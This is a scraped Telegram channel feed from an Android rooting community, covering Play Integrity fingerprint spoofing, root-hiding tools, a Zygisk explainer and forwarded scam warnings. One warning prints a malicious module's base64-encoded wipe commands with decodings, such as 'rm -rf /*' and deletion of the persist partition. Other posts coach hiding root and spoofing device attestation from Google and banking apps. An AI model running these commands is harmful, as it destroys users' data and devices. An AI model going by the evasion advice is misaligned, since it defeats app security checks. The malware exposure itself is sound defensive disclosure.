Announcement!
When you flexing, hide TestID and SerialNumber. We dont want google spy see that and ban the blackbox. Thats why dont flexing.
When you flexing, hide TestID and SerialNumber. We dont want google spy see that and ban the blackbox. Thats why dont flexing.
๐54โคโ๐ฅ5๐3๐ซก1
Guys, PIF tokay_beta fingerprint got banned, update your fingerprint and reboot your device. ( Reboot required )
TSupport has the F-Print updater, so dont ask for the file.
TSupport has the F-Print updater, so dont ask for the file.
๐33
What you guys think about this ?
Source: https://integritywiz.pro/
Someone chat me and telling me about this module, he say this module steal code. Well I just think that this module didn't give proper credits to the real owner ?
I have seen these module before, it has PIF and TS integrated inside the module.
Source: https://integritywiz.pro/
Someone chat me and telling me about this module, he say this module steal code. Well I just think that this module didn't give proper credits to the real owner ?
I have seen these module before, it has PIF and TS integrated inside the module.
๐ค19๐4โคโ๐ฅ2๐ฅ2๐คฏ1
Merry Christmas ๐โ๏ธโ๏ธ.
โคโ๐ฅ52๐ฅฐ7๐2๐ค2๐2๐ฅ1๐จโ๐ป1
Enhance your rooting experience with KernelSU-Next.
โขSupports NON-GKI kernels (4.x - 5.4 LTS).
โขGKI kernels compatible with LKM/KMI methods.
โขDedicated pre-patched SuSFS branches for effective root hiding.
โขRevamped user interface and new manager features.
โขModule installation confirmation and restoration after uninstallation.
โขOptimized sparse image size to 16GB.
โขIntegrated SuSFS library for CLI commands.
โขManager app supports auto-updates from new releases.
โขFrequent updates with more features on the way.
Learn More :
Telegram, Github, About.
โขSupports NON-GKI kernels (4.x - 5.4 LTS).
โขGKI kernels compatible with LKM/KMI methods.
โขDedicated pre-patched SuSFS branches for effective root hiding.
โขRevamped user interface and new manager features.
โขModule installation confirmation and restoration after uninstallation.
โขOptimized sparse image size to 16GB.
โขIntegrated SuSFS library for CLI commands.
โขManager app supports auto-updates from new releases.
โขFrequent updates with more features on the way.
Learn More :
Telegram, Github, About.
๐ค27๐16๐ฅ13
Please dont advertise crypto in the chat. Advertising crypto will directly banned!!!
๐35๐ซก7๐ฅฐ5๐คฏ1๐จโ๐ป1
Forwarded from ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ (๐ ๐๐ข๐ช๐ป๐ฎ ๐
)
This scammer on Telegram [UID 1878505335] is spreading a dangerous Magisk module to hack/destroy phones and demand money. (stoplamers gang)
[See Screenshot 1- CHAT BETWEEN SCAMMER & VICTIM]
What Happened:
โข [UID 7576386418] Victim Ganesh's phone was hacked via Scammer's module.
โข Scammer demanded $100, threatening to destroy the phone if they didn't pay.
โข This guy alerted me to this scam.
โข I went undercover to investigate how it works
[See Screenshot 2- CHAT BETWEEN SCAMMER & Investigator] MUST READ
Here's how it went down:
There were only two things needed: "Zygisk" and the "virus module" (click to read more)
I was really surprised to find out it didn't even require a restart. Once you flashed it, it was basically done.
So I contacted the person and, pretending to be someone else, said I wanted to access my girlfriend's phone. I acted like a nibba & He seemed to believe my story and sent me the module.
To see how it works, I needed to install it. Instead of using the real module, I made two fake modules. I just copied module.prop file from his module, repacked it with my update binary, and flashed it using "kernel su".
The person was then trying to do things to my phone, but nothing was happening.๐ญ ๐คฃ I was just watching it and was really laughing hard because it wasn't working. Then he sent commands to run in the terminal, related to the service.sh file inside his module. Since I hadnโt installed the original module, the commands didn't do anything. He then seemed confused and started asking for my Android and kernel versions๐. Finally, he sent something I wouldnโt run as it was an obvious privacy concern. So, I've decided to just hold on to things for now since I have enough evidence
What Happens If You Flash This Module?:
โข Scammer gets full access to your phone (data, messages, photos, chats etc.)
โข Scammer can steal your data and money.
โข Scammer can lock or destroy your phone. (he remotely destroyed victim's device making it unbootable)
โข You will be blackmailed.
- Moral from this incident๏ปฟ
โข Do not flash modules from unknown sources
โข Only use trusted modules.
โข Be suspicious of free or "too good to be true" modules.
โข Research modules before installing.
Stay safe and share this information with your friends to help stop these scams!
~ Regards // Mona
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ซก24๐8โคโ๐ฅ3๐ฑ2
๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ
I dont do research for this, but this posted from a big comunity.
- Never flash unknown module, especially unknown and closed source modules.Advice if your device has injected/infected with malicious code/software.
- Do some research first, before you flash.
Eject you simcard, make sure your device is not connected to Internet. In this case they remote your device ( with Internet ). To cut off the spread of your data you must disconnect from the Internet network.It's possible they used a reverse shell to connect to the target. We don't know for sure how they hacked.
โคโ๐ฅ13๐4
Just a reminder to those using root devices out there. Surely you already understand the risks of rooting your device. If you use the device for daily or work purposes, it is better to use a non-rooted device to make it more secure.
Please be more careful when doing anything with rooted devices. Big profits always come with big risks.
Please be more careful when doing anything with rooted devices. Big profits always come with big risks.
๐48โคโ๐ฅ6๐ฑ2
happy new year!! we all hope from here at citra that you have a year full of happiness and company.
โคโ๐ฅ41๐8
Play Integrity Issue
Anonymous Poll
60%
Device recognition verdict : NO_INTEGRITY
30%
App recognition verdict : Unevaluate
34%
Environment details verdict : POSSIBLE_RISK
NO_INTEGRITY - Set your SeLinux to Enforcing.
UNEVALUATE - Unsigned app is Installed ( No License app ), deleted it.
POSSIBLE_RISK - Scan your Play Protect.
UNEVALUATE - Unsigned app is Installed ( No License app ), deleted it.
POSSIBLE_RISK - Scan your Play Protect.
This is Demo.
Environment details verdict: POSSIBLE_RISK
Environment details verdict: POSSIBLE_RISK
๐7
This is Demo.
Device recognition verdict: NO_INTEGRITY
Device recognition verdict: NO_INTEGRITY
๐5
Guys I just want to tell you, that Magisk Kitsune has New Version that support Action button. Please update so more modules can work normally. I just telling this because there is still many of you using Magisk Kitsune/Delta but the version is outdated. For other root manager you can keep using it and keep updated.
๐ฆ Update Here.
๐ก Unofficial Telegram.
๐ฆ Update Here.
๐ก Unofficial Telegram.
๐17๐ฑ1
Forwarded from ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ (๐ ๐๐ข๐ช๐ป๐ฎ ๐
)
Ever wondered why some of your famous modules like Play Integrity Fix, LSposed, Shamiko etc. require ZYGISK to work?
KNOW WHAT YOU FLASH, DON'T BE A DUMBASS
Android has this process called the Zygoteโitโs the starting point for all apps. Zygisk sneaks into the Zygote process (where all apps are launched) and injects custom code before the app starts running. This lets it hide root, tweak apps, or even add features, all without the app noticing๐
Zygisk jumps into the Zygote process. Since the Zygote is where apps are created, Zygisk gets to control what happens from the start.
Once itโs hooked in, Zygisk can inject its own code into apps. This is how it:
> Hides root from apps like banking or games.
> Lets modules tweak apps in real-time.
> Makes customization smooth and precise.
Zygisk doesnโt mess with your system files directly. Instead, it works in the appโs runtime, which means any changes are temporary and way safer than old-school rooting hacks.
Modules like LSPosed and Play Integrity Fix, Shamiko etc. arenโt magicโtheyโre just really smart tools that use Zygiskโs ability to sneak into apps and mess with their rules.
๐พ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ
What the Heck is Zygisk?
Android has this process called the Zygoteโitโs the starting point for all apps. Zygisk sneaks into the Zygote process (where all apps are launched) and injects custom code before the app starts running. This lets it hide root, tweak apps, or even add features, all without the app noticing
How Zygisk Works
1. Hooks Into the System
Zygisk jumps into the Zygote process. Since the Zygote is where apps are created, Zygisk gets to control what happens from the start.
2. Injects Code
Once itโs hooked in, Zygisk can inject its own code into apps. This is how it:
> Hides root from apps like banking or games.
> Lets modules tweak apps in real-time.
> Makes customization smooth and precise.
3. Keeps it Clean
Zygisk doesnโt mess with your system files directly. Instead, it works in the appโs runtime, which means any changes are temporary and way safer than old-school rooting hacks.
Why Do Modules Need Zygisk?
Modules like LSPosed and Play Integrity Fix, Shamiko etc. arenโt magicโtheyโre just really smart tools that use Zygiskโs ability to sneak into apps and mess with their rules.
At the end of the day, all these powerful modules like PIF, LSPosed etc. are pretty much useless without Zygisk. Itโs the real slim shady that makes everything possible, letting you tweak apps, hide root, and unlock the full potential of your rooted device. Without Zygisk, none of this would be as smooth or even possible.
๐พ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ
Please open Telegram to view this post
VIEW IN TELEGRAM
๐28๐ฑ8โคโ๐ฅ5
Forwarded from ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ (๐ ๐๐ข๐ช๐ป๐ฎ ๐
)
๐จ ALERT: Malicious Magisk Module Exposed! ๐จ
Yโall, I found a dangerous module (zygisk next pro) that can wreck your phone. If youโre into Android modding, beware of this one before it wrecks your device.
This module uses base64 encoding to hide dangerous commands:
This malicious module is hosted on GitHub and spread across various telegram groups.
1. Donโt install random Magisk modules unless you trust the source.
2. Share this post with anyone you know who mods their phone. Letโs stop this scam from spreading.
~ Regards // Mona
Yโall, I found a dangerous module (zygisk next pro) that can wreck your phone. If youโre into Android modding, beware of this one before it wrecks your device.
What Does It Do and How Does It Hide the Damage?
This module uses base64 encoding to hide dangerous commands:
1. Wipes Everything on Your Phone
Encoded Command: cm0gLXJmIC8qCg==
Decoded Command: rm -rf /*
Effect: Deletes everythingโapps, files, systemโturns your phone into a brick.
2. Destroys Critical Hardware Data
Encoded Command: cm0gLXJmIC9tbnQvdmVuZG9yL3BlcnNpc3QvKiAmCg==๏ปฟ
Decoded Command: rm -rf /mnt/vendor/persist/*
Effect: Destroys key data like Wi-Fi settings and IMEI. No Wi-Fi, no calls.
3. Scrambles Your Data Forever
Encoded Command: L2Rldi9ibG9jay9ieS1uYW1lL3VzZXJkYXRhCg==
Decoded Command: /dev/block/by-name/userdata
Effect: Overwrites your data with junk. Photos, videos, filesโgone for good
Where Is It From?
This malicious module is hosted on GitHub and spread across various telegram groups.
What Should You Do?
1. Donโt install random Magisk modules unless you trust the source.
2. Share this post with anyone you know who mods their phone. Letโs stop this scam from spreading.
~ Regards // Mona
๐20๐ฑ15๐ฅ4
Forwarded from ๐ ๐๐ข๐ช ๐๐จ๐ ๐ฃ (๐ ๐๐ข๐ช๐ป๐ฎ ๐
)
These scams and malicious modules will keep coming, constantly changing their tactics.
The only way to stop them is to understand your phone is more valuable than any customization or module. Stop flashing modules from untrusted sources or those you donโt fully trust. Your phoneโs security comes first.
The only way to stop them is to understand your phone is more valuable than any customization or module. Stop flashing modules from untrusted sources or those you donโt fully trust. Your phoneโs security comes first.
Edit: The malicious modules have been taken down from GitHub. Thank y'all for reporting. Keep in mind, the zip still exists and has been circulated in various Telegram channels.
๐27๐ซก2
From now when you ask for help please read group notes first, then you need to provide this info :
Remember to tag me so I can see the message later. Members that face the same issue before, please help others when I am not online. Thanks for the help.
Device Model/Brand
ROM ( Stock/Custom )
ROOT Manager ( Magisk/Alpha/Delta/KSU/Apatch )
Module Screenshot
Remember to tag me so I can see the message later. Members that face the same issue before, please help others when I am not online. Thanks for the help.
๐48๐ฅ3